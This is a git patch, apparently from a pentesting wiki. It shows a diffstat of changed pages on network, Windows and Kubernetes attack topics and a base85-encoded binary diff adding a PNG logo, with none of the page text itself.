From b8b4c413da845f47829fbde053a310b82b3f6542 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 8 May 2022 23:13:03 +0000 Subject: [PATCH] GitBook: [#3195] No subject --- .gitbook/assets/SB logo black_034525.png | Bin 0 -> 152489 bytes README.md | 13 +- .../linux-forensics.md | 88 ++++++------ .../shells/full-ttys.md | 27 ++-- .../tunneling-and-port-forwarding.md | 131 ++++++++++-------- .../android-app-pentesting/smali-changes.md | 48 ++++--- .../113-pentesting-ident.md | 34 +++-- .../2375-pentesting-docker.md | 14 ++ .../5353-udp-multicast-dns-mdns.md | 14 ++ .../554-8554-pentesting-rtsp.md | 15 +- .../873-pentesting-rsync.md | 14 ++ .../pentesting-finger.md | 41 +++--- .../pentesting-rpcbind.md | 34 +++-- network-services-pentesting/pentesting-vnc.md | 14 ++ .../pentesting-web/nginx.md | 66 +++++---- .../url-format-bypass.md | 32 +++-- .../pentesting-kubernetes-from-the-outside.md | 14 ++ .../reversing-tools-basic-methods/README.md | 16 ++- .../asreproast.md | 26 ++-- .../kerberos-authentication.md | 30 ++-- windows-hardening/ntlm/smbexec.md | 26 ++-- .../stealing-credentials/README.md | 78 ++++++----- .../rottenpotato.md | 25 ++-- 23 files changed, 519 insertions(+), 281 deletions(-) create mode 100644 .gitbook/assets/SB logo black_034525.png diff --git a/.gitbook/assets/SB logo black_034525.png b/.gitbook/assets/SB logo black_034525.png new file mode 100644 index 0000000000000000000000000000000000000000..edec3d46ada123688d0bac2ceab6d29e6700e92f GIT binary patch literal 152489 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 